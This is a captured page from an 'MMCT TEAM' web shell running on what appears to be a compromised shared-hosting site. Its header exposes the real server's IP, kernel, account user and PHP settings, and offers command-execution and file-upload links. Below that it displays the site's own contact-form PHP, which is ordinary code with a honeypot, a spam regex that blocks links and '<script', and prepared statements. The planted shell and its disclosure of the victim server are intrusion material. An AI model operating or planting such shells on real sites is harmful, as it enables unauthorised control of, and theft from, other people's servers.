MMCT TEAM
Server IP : 2a02:4780:11:1596:0:cbc:26e7:10  /  Your IP : 216.73.216.78
Web Server : LiteSpeed
System : Linux in-mum-web1496.main-hosting.eu 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
User : u213657319 ( 213657319)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u213657319/domains/../public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u213657319/domains/../public_html/action.php
<?php 
include("include/connection.php");

if(isset($_POST['query'])){
    
    // --- 1. BOT PROTECTION (Honeypot) ---
    // HTML form mein ye field zaroor dalein: <input type="text" name="website_url" style="display:none;">
    if(!empty($_POST['website_url'])) {
        die("Bot activity detected!"); 
    }

    // --- 2. DATA CLEANING ---
    $name     = strip_tags(trim($_POST['name']));
    $email    = strip_tags(trim($_POST['email']));
    $subject  = strip_tags(trim($_POST['subject']));
    $contact  = strip_tags(trim($_POST['contact']));
    $message  = strip_tags(trim($_POST['message']));

    // --- 3. ADVANCED HACKING & SPAM CHECK ---
    // Is pattern mein humne Links, HTML Tags aur suspicious Keywords (jaise 'buy online', 'shop') ko bhi add kiya hai
    $spam_pattern = "/(http|https|www|\.com|\.net|\.org|\.in|href|src|<script|buy online|shop online|купить|internet-store)/i";

    if (preg_match($spam_pattern, $message) || preg_match($spam_pattern, $name)) {
        // Agar aapke bataye huye text jaisa kuch milta hai (e.g. "купить" jo ki Russian mein buy hai)
        echo "<script>alert('Security Alert: Promotional content or links are not allowed!');</script>";
        echo "<script>window.open('index.php','_self')</script>";
        exit();
    }

    // --- 4. SQL INJECTION PROTECTION (Prepared Statements) ---
    // Ye sabse important hai SQL hacking se bachne ke liye
    $stmt = mysqli_prepare($con, "INSERT INTO `query` (`name`, `email`, `subject`, `number`, `message`) VALUES (?, ?, ?, ?, ?)");
    
    if($stmt) {
        mysqli_stmt_bind_param($stmt, "sssss", $name, $email, $subject, $contact, $message);
        
        if(mysqli_stmt_execute($stmt)) {
            echo "<script>alert('Thank You, I will contact you shortly')</script>";
            echo "<script>window.open('index.php','_self')</script>";
        } else {
            // Database error hide karne ke liye generic message
            echo "<script>alert('Something went wrong. Please try again later.')</script>";
        }
        
        mysqli_stmt_close($stmt);
    }
}



?>

MMCT - 2023